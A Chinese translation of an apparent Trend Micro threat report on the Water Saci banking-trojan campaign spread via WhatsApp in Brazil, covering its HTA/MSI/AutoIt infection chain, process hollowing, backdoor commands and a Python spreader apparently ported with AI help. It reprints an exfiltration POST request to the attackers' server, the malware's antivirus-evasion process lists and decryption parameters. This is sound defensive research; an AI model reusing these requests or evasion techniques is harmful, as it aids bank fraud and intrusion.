Water Saci新型多格式AI增强攻击:通过WhatsApp传播的威胁链剖析

本文详细分析了Water Saci黑客组织的最新攻击活动。该活动通过WhatsApp传播,采用包含HTA、ZIP、PDF在内的多层多格式攻击链,利用AI工具将传播脚本从PowerShell转换为Python,并部署银行木马以窃取凭证和控制系统。

Unraveling Water Saci’s New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp

关键要点

  • 巴西的Water Saci活动被发现采用了高度分层的攻击链,涉及多种文件格式(包括HTA文件、ZIP压缩包和PDF),旨在绕过简单的基于模式的检测并增加分析的复杂性。
  • 攻击者通过将其基于PowerShell的传播例程转换为Python变体来切换策略,这表明其开发流程正在加速。这种新观察到的变体允许更广泛的浏览器兼容性、面向对象的代码结构、增强的错误处理以及通过WhatsApp Web更快速地自动传递恶意软件。
  • 有证据表明,攻击者可能使用了像LLM这样的AI工具将其恶意软件传播脚本从PowerShell转换为Python;这解释了他们在批量消息发送、改进的错误处理和增强的控制台输出方面的能力。
  • Trend Vision One™ 检测并阻止本博客中讨论的IoC。趋势科技客户还可以访问定制的狩猎查询、威胁洞察和情报报告,以更好地了解并主动防御此活动。

巴西近期观察到通过WhatsApp传播的威胁激增。正如我们之前发布的关于SORVEPOTEL恶意软件和更广泛的Water Saci活动的研究中所观察到的,这个流行平台被用来发起复杂的活动。毫无戒心的用户会收到来自可信联系人的令人信服的消息,这些消息通常经过精心设计,利用社会工程学策略并鼓励用户与恶意内容互动。虽然这些活动的核心目标保持一致,但这波攻击展示了感染、持久化和规避方面的高级技术,突显了合法平台如何日益被利用来更有效地攻击巴西目标。 其新的多格式攻击链以及可能使用人工智能(AI)将传播脚本从PowerShell转换为Python,展示了一种分层方法,使Water Saci能够绕过传统的安全控制,利用跨多个渠道的用户信任,并提高其感染率。随着对手技术的演变,组织必须为结合技术复杂性和AI增强敏捷性的活动带来的更高风险做好准备。

通过WhatsApp消息进行多格式恶意软件传递

此活动的初始阶段展示了威胁行为者通过WhatsApp接触受害者所采用的多种入口点。用户报告称收到了来自可信联系人的包含各种形式恶意附件的消息。 一些用户收到了压缩的归档文件,例如包含有害负载的ZIP文件(图1)。其他用户则被诱骗下载看似良性的PDF文档,通常伴有看似合理的诱饵,例如请求更新Adobe Reader以正常查看(图2和图3)。

图 1. 诱使用户打开ZIP文件的WhatsApp消息

图 2. 诱使用户打开PDF文件的WhatsApp消息

图 3. 诱使用户点击/更新Adobe的模糊图像

值得注意的是,一部分受害者成为恶意.hta文件直接传递的目标。与ZIP或PDF格式不同,.hta文件在打开时会立即执行其嵌入的脚本,从而为攻击者简化了感染过程。在多个案例中观察到一个细节:文件是从web.whatsapp[.]com下载的,文件名遵循A-{随机字符}.hta的模式,如图4中的Trend Vision One™遥测日志所示。

图 4. 恶意HTA文件

技术分析

图 5. 攻击链

初始向量 - HTA文件

感染链始于用户执行恶意HTA文件,该文件包含一个嵌入的Visual Basic (VB)脚本,该脚本利用两层混淆来逃避检测并阻碍分析。一旦此脚本被反混淆,它会显示在C:\temp\instalar.bat创建批处理文件的命令,如果执行,该批处理文件将启动连接到攻击者的命令与控制(C&C)服务器以下载MSI安装程序和自动化(Python)脚本及其支持组件。

银行木马 - 第一阶段

执行批处理文件后,感染链继续下载并安装MSI包。此安装程序是传递银行木马并在受感染系统上启动其恶意活动的主要载体(图6)。

图 6. 导致银行木马有效载荷的MSI安装

检查发现,MSI包包含几个关键组件,详见表1:

文件名 描述
DaXGkoD7.exe AutoIt解释器
Ons7rxGC.log 编译的AutoIt脚本
run.vbs AutoIt的初始启动器
starter.bat 在指定文件夹中启动AutoIt的批处理文件
ucJDpQ.tda 加密的PE有效载荷
fKmkzW.dmp 替代的加密PE有效载荷(如果ucJDpQ.tda缺失,fKmkzW.dmp充当有效载荷)

表 1. MSI包中的文件

安装程序利用自定义操作来执行包含的VB脚本(run.vbs),如图7所示。该脚本启动AutoIt解释器(DaXGkoD7.exe)以运行编译的AutoIt脚本(Ons7rxGC.log),如图8所示。此过程最终导致打包在包内的最终银行木马有效载荷的解包和激活。

图 7. MSI安装程序最初使用CustomAction执行VB脚本

图 8. VB脚本启动AutoIt解释器(DaXGkoD7.exe),然后运行编译的AutoIt有效载荷(ONs7rxGC.log)

AutoIt脚本检查它是否是第一次执行,然后通知远程服务器(图9)。如果标记文件executed.dat不存在,该函数会向指定的URL发送通知并创建带有时间戳的标记文件。此机制确保仅在第一次执行期间触发通知。

图 9. AutoIt脚本通过远程通知初始化首次执行逻辑

从感染案例中找到的其他AutoIt脚本开始时会检查系统语言。如图10所示,它通过比较其语言代码(0416)来验证Windows是否设置为葡萄牙语(巴西)。如果不是,则显示检测到的语言的错误消息并退出程序。一个辅助函数将语言代码转换为可读的名称,如葡萄牙语(葡萄牙)、英语(美国)或西班牙语(西班牙)。

图 10. 语言验证例程,确保Windows设置为葡萄牙语(巴西)

然后,脚本扫描用户的系统以查找与银行相关的活动(图11),将发现的结果编译成列表,并将数据发送到C&C服务器。第一个函数DETECTARBANCO检查是否存在与巴西银行应用程序相关的特定目录(表2)。如果这些文件夹存在,脚本会记录相应的银行名称,从而有效地识别用户与哪些金融机构互动。在巴西,访问大多数主要银行都需要由独立公司开发的安全模块,以试图保护最终用户免受客户端欺诈。攻击者知道这一点,并将其用作猜测受害者主要银行的可靠方法。

图 11. 检查已安装的巴西银行应用程序

文件路径 关联的银行应用程序
C:\Program Files (x86)\scpbrad Bradesco银行软件
C:\Program Files\Warsaw Banco do Brasil (BB) 和 Caixa Econômica Federal (CEF) 部署的Warsaw安全模块
C:\Program Files\Topaz OFD Banco do Brasil (BB) 和 Caixa Econômica Federal (CEF) 部署的Topaz OFD反欺诈模块
C:\Sicoobnet Sicoob银行软件
AppData\Local\Aplicativo Itau Itaú银行应用程序

表 2. 与巴西银行应用程序关联的文件路径

第二个函数VERIFICARHISTORICOCHROME()专注于分析用户的Chrome浏览器历史记录,以识别对银行网站的访问(图12)。它定位用户配置文件目录中的Chrome历史记录数据库,创建临时副本并读取其内容。然后,该函数搜索特定的与银行相关的URL(表3)。如果找到任何这些URL,则记录相应的银行名称。即使系统上没有安装银行软件,此技术也允许脚本检测银行活动。

图 12. 检查Chrome浏览器历史记录中访问过的银行网站

目标URL 关联银行
www[.]santander[.]com[.]br Santander
autoatendimento[.]bb[.]com[.]br Banco do Brasil
internetbanking[.]caixa[.]gov[.]br Caixa Econômica Federal
www[.]sicredi[.]com[.]br Sicredi
banco[.]bradesco Bradesco

表 3. 第二个函数搜索的特定银行相关URL

在识别已安装的银行应用程序并分析浏览器历史记录后,脚本继续进行另一个关键侦察步骤:检查防病毒和安全软件。它检查正在运行的进程中是否存在与以下安全软件相关的可执行文件:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

360sd.exe
360tray.exe
ashDisp.exe
aswidsagent.exe
avast.exe
AvastSvc.exe
AvastUI.exe
avgnt.exe
avgui.exe
avguix.exe
avp.exe
avpui.exe
bdagent.exe
ccapp.exe
ccSvcHst.exe
cfp.exe
cmdagent.exe
egui.exe
eguiProxy.exe
ekrn.exe
fshoster32.exe
kavtray.exe
klwtblfs.exe
mbam.exe
MBAMService.exe
mbamtray.exe
mcshield.exe
Mcshield.exe
mcuicnt.exe
MSASCui.exe
MSASCuiL.exe
MsMpEng.exe
NisSrv.exe
ns.exe
PSUAMain.exe
PSANHost.exe
SAVADMINSERVICE.EXE
SAVService.exe
seccenter.exe
SecurityHealthSystray.exe
SophosUI.exe
vkise.exe
vsserv.exe
WRSA.exe
zatray.exe
ZAPrivacyService.exe

脚本还遍历Windows卸载注册表项,搜索与防病毒和安全软件相关的以下关键字:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

360
anti-virus
antivirus
avast
avg
bitdefender
comodo
defender
eset
f-secure
kaspersky
malwarebytes
mcafee
norton
panda
security
sophos
trend micro
webroot
zonealarm

除了收集有关已安装的银行应用程序、安全软件和访问银行网站的详细信息外,脚本还收集以下信息,这些信息随后被发送到远程C&C服务器:

  • 计算机名
  • 操作系统版本、架构和内部版本号
  • 用户名
  • 本地IP地址
  • 外部IP地址
  • 当前日期和时间
  • Windows版本
  • CPU型号
  • 总物理内存

脚本监控一系列针对巴西银行、支付平台和加密货币交易所/钱包的关键字。它枚举所有打开的窗口,然后搜索关键字匹配。 目标实体包括:

  • 巴西银行:
    • Banco do Brasil
    • BMG
    • Bradesco
    • BS2
    • BTG Pactual
    • CEF
    • Itaú
    • Santander
    • Sicoob
    • Sicredi
  • 支付平台:
    • Mercado Pago
  • 国际交易所:
    • Binance
    • Bitfinex
    • Bitstamp
    • Bybit
    • Coinbase
    • Crypto.com
    • Gate.io
    • Huobi
    • Kraken
    • KuCoin
    • OKX
  • 巴西交易所:
    • Bitcoin Trade
    • BitPreco
    • Braziliex
    • FlowBTC
    • Foxbit
    • Mercado Bitcoin
    • NovaDAX
  • 加密货币钱包:
    • Atomic Wallet
    • Blockchain.com
    • Coinomi
    • Electrum
    • Exodus
    • Jaxx
    • Ledger Live
    • MetaMask
    • MyCrypto
    • MyEtherWallet
    • Phantom
    • Solflare
    • TokenPocket
    • Trezor
    • Trust Wallet

有效载荷的解密是通过检测受害者计算机上与银行或加密货币相关的窗口来触发的(图13)。如果任何这些窗口包含与目标实体相关的关键字,则继续定位之前作为MSI安装程序一部分放置的.tda文件(ucJDpQ.tda)。如果未找到.tda文件,则转而查找.dmp文件(fKmkzW.dmp)。

图 13. 定位、解密和解压缩有效载荷

一旦找到,加密的有效载荷(.tda或.dmp文件)将作为二进制数据读取,并通过两阶段的解密和解压缩过程,然后加载到内存中:

  1. 使用具有硬编码参数(seed=1000, multiplier=3333, increment=3434)的自定义RC4类流密码解密有效载荷,从而解锁内部隐藏的压缩可执行文件。
  2. 然后使用Windows本机LZNT1算法通过RtlDecompressFragment API解压缩解密的数据,将其扩展回完整的PE可执行文件。

如果存在.tda文件,AutoIt脚本会将其解密并作为中间PE加载器(阶段2)加载到内存中。但是,如果只找到.dmp文件(没有.tda),AutoIt脚本会完全绕过中间加载器,直接将银行木马加载到AutoIt进程内存中,跳过进程空洞步骤,并作为更简单的两阶段感染运行。

银行木马 - 第二阶段

然后,该加载器搜索包含最终银行木马的额外.dmp或.tda文件,使用相同的例程解密和解压缩有效载荷(图14)。

图 14. 定位最终的.dmp或.tda有效载荷文件

加载器将其注入到被掏空的svchost.exe进程中,以与合法的Windows系统进程混合(图15)。它还包括一个替代的回退基地址,以防虚拟内存分配失败,确保注入过程仍然可以继续进行(图16和图17)。

图 15. 创建挂起的进程并分配内存

图 16. 替代回退基地址

图 17. 在设置线程上下文并将恶意有效载荷写入内存后恢复被掏空的进程

银行木马 - 持久化

脚本运行有效载荷的入口点后,AutoIt脚本精确等待两秒钟,让有效载荷有时间完成svchost.exe内部的进程空洞例程(图18)。

图 18. 将解密的有效载荷加载到内存中并捕获PID

然后,脚本列出所有正在运行的svchost.exe进程(图19),检索它们的创建时间戳,并识别假定为已执行进程空洞的恶意进程的最新实例。

图 19. 监控最新的svchost.exe进程

脚本存储所述svchost.exe进程的PID,并进入连续监控循环,定期检查此特定svchost.exe进程是否仍在运行。如果进程空洞的svchost.exe被终止,恶意软件会重置其状态,清除存储的PID,并等待在受害者下次打开银行窗口时重新注入有效载荷,确保持久访问受害者的银行会话。

银行木马

此样本中的几种行为与之前在Casbaneiro(Metamorfo)银行恶意软件系列中观察到的行为相似。与早期依赖启动器可执行文件调用AutoIt3来运行编译的.A3X脚本以及包含主有效载荷的DLL的Metamorfo活动一样,此样本表现出相同的基于AutoIt的多阶段传递模式。此链最终解包并激活银行木马有效载荷——反映了Metamorfo标志性的依赖AutoIt作为加载器框架的特点。结合熟悉的窗口标题监控、基于注册表的持久化、基于IMAP的回退C&C机制以及诸如<||>之类的令牌式C&C标记的存在,该样本反映了与Casbaneiro/Metamorfo在结构和行为上的连续性。

反沙箱分析

一旦执行,有效载荷便以一系列激进的反虚拟化检查开始,旨在逃避分析环境。恶意软件查询注册表路径HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\,专门查找以下与VM相关的服务:

  • VGAuthService
  • vm3dservice
  • VMTools
  • vmvss

它还枚举活动服务以检查相同的字符串。如果找到任何匹配项,恶意软件会立即通过RaiseException触发自定义异常(EEDFADE),从而有效终止执行以避免沙箱分析(图20)。

图 20. 用于反沙箱分析的触发异常

通过WMI进行系统分析

如果未检测到虚拟化,有效载荷会继续通过多个WMI查询收集主机信息,包括:

  • AntiVirusProduct
  • Win32_ComputerSystem
  • Win32_OperatingSystem
  • Win32_Processor

被盗信息稍后作为初始签入的一部分发送到C&C服务器。

注册表修改和持久化

恶意软件在HKEY_CURRENT_USER\Software\MyUniqueApp下创建一个唯一的应用程序注册表项,将UniqueSerial设置为UUID生成的字符串。为了保持持久性,它将自身添加到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run的AutoRun注册表项,将条目指向其可执行路径。它还在HKEY_CURRENT_USER\Software\MeuApp下放置一个额外的标记,设置inicio = true,指示应开始主例程。

C&C签入通信

然后,有效载荷连接到其C&C服务器hxxps://serverseistemasatu.com/data.php?recebe并发送包含系统和用户信息的POST请求:

1
2
3
4
5
6
7
8

POST /data.php?recebe HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: DelphiApp
Host: serverseistemasatu.com
Content-Length: 267
Cache-Control: no-cache

nomeRegistro={用户名}&nomeComputador={计算机名}&nomeSistema={操作系统}&processador={处理器}&antivirus={防病毒产品}&ultimaAtualizacao={日期}

目标银行窗口检测

恶意软件包含一个基于计时器的例程(TForm1_Timer4Timer),持续扫描活动窗口的标题,以识别用户是否正在与银行或加密货币平台交互。当找到匹配项时,恶意软件会根据预定义的窗口标题子字符串对检测到的应用程序进行分类,这些子字符串通常与主要金融机构和交易所相关联(表4)。

类别 窗口标题/子字符串 检测为
Santander Santander - Ofertas para Empresas Santander
Internet banking empresarial - Santander Santander
Santander - Santander
Banco do Brasil Banco do Brasil - Banco do Brasil
Banco do Brasil e mais Banco do Brasil
Autoatendimento Banco do Brasil Banco do Brasil
Banrisul Banrisul Home Banking Banrisul
Portal Internet Banrisul Home Banking Banrisul
Banrisul Office Banking Banrisul
Tribanco Tribanco » Para sua Empresa Tribanco
Tribanco » Para Você Tribanco
Bradesco Banco Bradesco Bradesco
Bradesco Net Empresa Bradesco - Bradesco
Bradesco Net Empresa Bradesco Bradesco
Bradesco Prime - Bradesco
Bradesco Prime e Bradesco
Internet Banking Bradesco: Bradesco
Internet Banking Bradesco: Saldos, extratos, Pix e muito mais! Bradesco
Bradesco Exclusive Digital Mais facilidade e autonomia - Bradesco
Bradesco Exclusive Digital Mais facilidade e autonomia Bradesco
Bradesco Para Você Bradesco
Bradesco Prime Digital Bradesco Prime Bradesco
Bradesco Global Private Bank Assessoria de Investimentos Especializada Bradesco
NavegadorExclusivoBradesco.exe Bradesco
Sicredi Sicredi Sicredi
Sicoob SicoobNet Sicoob
Sicoob - Sicoob
sicoob.com.br - SicoobNet Sicoob
BMG Bem-vindo ao seu BMG BMG
BMG - BMG
BTG Pactual app.btgpactual.com BTG Pactual
BTG Pactual - BTG Pactual
BTG Pactual Empresas BTG Pactual
BS2 app.empresas.bs2.com BS2
BS2 - BS2
Empresas BS2 BS2
Itaú Banco Itaú - Itaú
Itaú Personnalité I Itaú
Itaú Uniclass: Itaú
Itaú BBA - Itaú
Itaú BBA Itaú
Itaú BBA e Itaú
Itaú Empresas Itaú
Crypto/Exchange Entrar Binance Binance
Iniciar sessão Binance Binance
Entre no site da OKX OKX OKX
Crypto.com Log in Crypto.com
Faça o login e acesse a sua conta do Mercado Bitcoin MB Mercado Bitcoin
Coinbase CryptoBR
Foxbit CryptoBR
Faça o login e acesse a sua conta do NovaDax NovaDax NovaDax
Faça login e opere Bitget Bitget
Login Bybit Bybit
- default_wallet CryptoBR
Login - Acesse sua conta Coinext Coinext

表 4. 恶意软件分类的与主要金融机构和交易所相关的预定义窗口标题子字符串

基于IMAP的二级C&C发现

该有效载荷使用与我们最近对Water Saci活动的分析中记录的相同的基于IMAP的技术,其中恶意软件使用硬编码凭据登录terra.com.br邮箱,并检索标题为“meu”的电子邮件,以从以IP:开头的行中提取更新的C&C地址(图21)。关键区别在于,虽然早期实例仅出现在恢复的辅助脚本中,但此版本将IMAP例程直接合并到注入的有效载荷本身中,这表明操作者正在重用相同的基础设施和方法,但现在已将其更深地嵌入到恶意软件的运行时中,以使C&C更新更加无缝和可靠。

图 21. 用于基于IMAP的技术C&C检索的函数

浏览器终止例程

在执行凭据相关操作之前,有效载荷强制终止多个浏览器:

  • chrome.exe
  • firefox.exe
  • msedge.exe
  • NavegadorExclusivoBradesco.exe
  • Opera.exe

这种行为在拦截会话或迫使受害者在攻击者控制条件下重新打开银行网站的银行恶意软件中很常见。

后门功能

注入的有效载荷还包括一套广泛的后门命令,授予操作者对受感染系统的近乎完全的远程控制。表5总结了大多数命令及其描述,提供了对该银行木马可以在受害者机器上执行的完整操作范围的洞察。

类别 命令 描述
连接命令 `< SocketMain
`< OK
`< PING
`< Close
认证与安全 `< NOSenha
远程桌面和屏幕控制 `< REQUESTKEYBOARD
`< first
`< AtivarImagem
`< DesativarImagem
`< AlterarResolucao
通信功能 `< OpenChat
`< Chat
`< CloseChat
鼠标控制命令 `< MousePos
`< MouseLD
`< MouseLD_Volta
`< MouseLU
`< MouseLU_Volta
`< MouseRD
`< MouseRD_Volta
`< MouseRU
`< MouseRU_Volta
`< MouseMD
`< MouseMD_Volta
`< MouseMU
`< MouseMU_Volta
`< MouseWheelUp
`< MouseWheelUp_Volta
`< MouseWheelDown
`< MouseWheelDown_Volta
`< MOUSESENDINPUT
`< MOUSESENDNORMAL
`< LULUZSD
文件系统操作 `< Folder
`< Files
`< DownloadFile
`< UploadFile
系统控制 `< RESTART
`< CMD
`< MONKEY
Windows管理 `< LIST_WINDOWS
`< LISTMIN_WINDOWS
`< LISTKILL_WINDOWS
监控与规避 `< MOVISIBLE
`< MOINVISIBLE
`< BLOQUEARMOUSE
`< RESTAURARMOUSE
`<zzz DELETEDKL
`< MENSAGEM
系统信息 `< GETINFO
`< Metodo
`< Reconected
打印系统控制 `< GETPRINTHANLE
`< GETPRINTMAGNIFIER
`< GETPRINTDESKTOP
`< GETPRINTAPP
银行/金融恶意软件功能 `< CE_ASSI
`< CE_TRANS
`< CB_SEN
`< CB_UPDATE
`< PedidoSenhas
`< SendSenha
`< HOLE
`< HOLENOFF

表 5. 授予操作者对受感染系统近乎完全远程控制的后门命令

传播自动化 - whatsz.py

我们的分析显示,我们之前博客文章中讨论的tadeu.ps1whatsz.py(图22)在功能上等同于WhatsApp自动化恶意软件。Python样本似乎是PowerShell版本的增强移植版,保持了相同的工作流程、逻辑和意图。在此阶段广泛使用Python使攻击者能够自动化传播,简化有效载荷传递,并增强其恶意操作的灵活性和弹性。

图 22. instalar.bat下载并由whatsz.py使用的组件文件

instalar.bat被执行时,它下载了组件文件,包括Python 3.12.7、get-pip.py以及Python脚本正常运行并执行其传播例程所需的chromedriver.exe(图23)。PowerShell (tadeu.ps1)和Python (whatsz.py)脚本基本上做同样的事情。它们通过Selenium自动化WhatsApp,注入WA‑JS库,抓取联系人列表,自动发送文件(使用Base64编码),加载远程配置,暂停和恢复任务,并将进度报告回C&C服务器。

图 23. 在Vision One中看到的执行instalar.bat导致Python脚本例程

表6比较了先前基于PowerShell的传播例程与新观察到的Python变体,突出了它们在最新活动中共享的自动化功能和增强功能。

功能 PowerShell (tadeu.ps1) Python (whatsz.py) 匹配?
通过Selenium实现WhatsApp自动化
注入WA-JS库
批量联系人提取
自动化文件发送
Base64文件编码
远程配置加载
暂停/恢复系统
向C&C报告进度
联系人列表窃取

表 6. 基于PowerShell的传播例程与Python变体之间的功能比较

鉴于逻辑的相似性、注入的JavaScript以及Python代码本身包含的明确描述“WhatsApp Automation Script – Versao Python Convertido de PowerShell para Python Suporte para Chrome, Edge e Firefox”(图24),有令人信服的间接证据表明,可能使用了自动化辅助工具,例如大型语言模型(LLM)或代码翻译工具,来加速移植过程。LLM已被证明具有跨语言翻译和重构代码的能力,并且通常用于遗留迁移和跨语言翻译等任务。虽然这一观察结果并不能最终证明LLM参与其中,但它有力地支持了LLM可能加速了转换过程的合理性。

图 24. Python脚本头部明确声明是从PowerShell转换而来

图25和图26显示了脚本的其他部分,这些部分暗示使用LLM来加快转换过程。提供的片段进一步说明了与AI的潜在交互,其中提出了增强功能的请求。

图 25. 文本:“向联系人发送消息 - 经过错误处理优化的版本”

图 26. 文本:“同时向多个联系人发送消息 - 超快!”

值得注意的是,脚本包括优化的消息传递函数和具有不同状态(图27)的全面格式定义的主自动化类。

图 27. 为不同状态定义格式的主自动化类

脚本在后台运行时产生非常有趣且色彩丰富的输出,包括在控制台输出中使用表情符号(图28)。这对于手动编写的自动化脚本来说并不典型,可能表明AI生成的代码旨在增强用户体验。

图 28. 色彩丰富且带有表情符号的控制台输出示例,暗示可能的AI生成的脚本功能。

尽管逻辑相似,但进行了实质性的改进,这些改进显著增加了Python变体的覆盖范围、可靠性和操作灵活性;这表明移植不仅仅是直接翻译,而是一次升级。Python构建转向了更便携的运行时,将关注点分离到更清晰的类中,增加了更丰富的错误处理和批量发送功能,并扩大了浏览器支持(表7)。总之,这些变化使传播速度更快,更能抵御失败,并且更易于维护或扩展。

方面 PowerShell Python 意义
语言 PowerShell Python 3 移植/翻译
浏览器支持 仅Chrome Chrome/Edge/Firefox 增强能力和更广覆盖
代码组织 函数 面向对象(类) 更好的结构
错误处理 基本的try-catch 增强的特定处理程序 更健壮
批量发送 仅单个 单个 + 批量模式 更快传播
无头模式 支持 支持(增强) 隐秘操作
联系人过滤 基本 增强的(@lid过滤) 更好的目标定位

表 7. 与PowerShell变体相比,Python变体的改进

结论

Water Saci活动代表了巴西网络威胁的新时代,攻击者利用WhatsApp等流行消息平台的信任和覆盖范围来策划大规模的、自我传播的恶意软件活动。通过将熟悉的通信渠道武器化并采用高级社会工程学,威胁行为者能够迅速危害受害者,绕过传统防御,并维持持久的银行木马感染。此活动展示了合法平台如何转变为恶意软件传递的强大载体,并突显了该地区网络犯罪活动的日益复杂化。 该活动的多阶段感染链——跨越恶意HTA文件、MSI安装程序和基于Python的高级自动化——突显了当今威胁的日益复杂性。值得注意的是,通过WhatsApp集成传播自动化、反分析措施和强大的持久化机制,使攻击者能够最大限度地扩大覆盖范围,同时逃避检测并保持对受感染系统的长期访问。 此分析强调了组织和个人采用多层安全方法的紧迫性。主动措施,例如在消息应用程序中禁用自动下载、限制文件传输、提高用户意识以及部署高级端点安全解决方案,对于防御像Water Saci这样的复杂、基于脚本的威胁至关重要。 随着攻击者不断创新,利用技术和社交媒介,必须将强大的技术与持续的教育和警惕的安全实践相结合。趋势科技仍然致力于监控这些不断演变的威胁,提供可操作的情报,并赋予组织领先于对手的能力。

防御建议

为了尽量减少与Water Saci活动相关的风险,趋势科技建议采取几项实用的初始防御措施:

  • 禁用WhatsApp上的自动下载。在WhatsApp设置中关闭媒体和文档的自动下载,以减少意外暴露于恶意文件的风险。
  • 控制个人应用程序上的文件传输。使用端点安全或防火墙策略来阻止或限制通过个人应用程序(如WhatsApp、Telegram或WeTransfer)在公司管理的设备上进行文件传输。如果您的组织支持自带设备(BYOD),请强制执行严格的应用程序白名单或容器化以保护敏感环境。
  • 增强用户意识。Water Saci活动的受害者学表明攻击者正在瞄准企业。定期的安全培训有助于组织的员工认识到通过消息平台下载文件的危险。建议用户避免点击意外的附件或可疑链接,即使它们来自已知联系人,并提倡使用安全、经批准的渠道传输业务文档。
  • 增强电子邮件和通信安全控制。限制对公司设备上个人电子邮件和消息应用程序的访问。使用具有URL过滤功能的网络和电子邮件网关来阻止已知的恶意C&C和网络钓鱼域名。
  • 强制执行多因素身份验证(MFA)和会话卫生。要求所有云和Web服务都使用MFA,以防止会话劫持。建议用户在使用消息应用程序后注销,并定期清除浏览器Cookie和令牌。
  • 部署高级端点安全解决方案。使用趋势科技的端点安全平台(例如Trend Micro Apex One™或Vision One)来检测和阻止可疑的基于脚本的攻击、无文件恶意软件和自动化滥用。启用行为监控以捕获未经授权的VBS/PowerShell执行、浏览器配置文件更改以及与WhatsApp和类似威胁相关的横向移动尝试。

实施这些建议将有助于组织和个人更好地防御通过消息应用程序传递的恶意软件威胁。

趋势Vision One™的主动安全

趋势Vision One™是唯一由AI驱动的企业网络安全平台,它将网络风险暴露管理和安全运营集中起来,为本地、混合和多云环境提供强大的分层保护。 以下部分包含趋势Vision One洞察、报告和查询,以及本报告中的附加信息。

趋势Vision One威胁情报

为了领先于不断演变的威胁,趋势科技客户可以访问趋势Vision One威胁洞察,该功能提供趋势™研究关于新兴威胁和威胁行为者的最新见解。 趋势Vision One威胁洞察

  • 威胁行为者:Water Saci
  • 新兴威胁:Water Saci暴露威胁行为者利用WhatsApp作为自我传播感染渠道 趋势Vision One情报报告(IOC扫描)
  • Water Saci暴露威胁行为者利用WhatsApp作为自我传播感染渠道

狩猎查询

趋势Vision One搜索应用 趋势Vision One客户可以使用搜索应用来匹配或狩猎其环境中与本博客文章中提到的恶意指标相关的数据。

comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次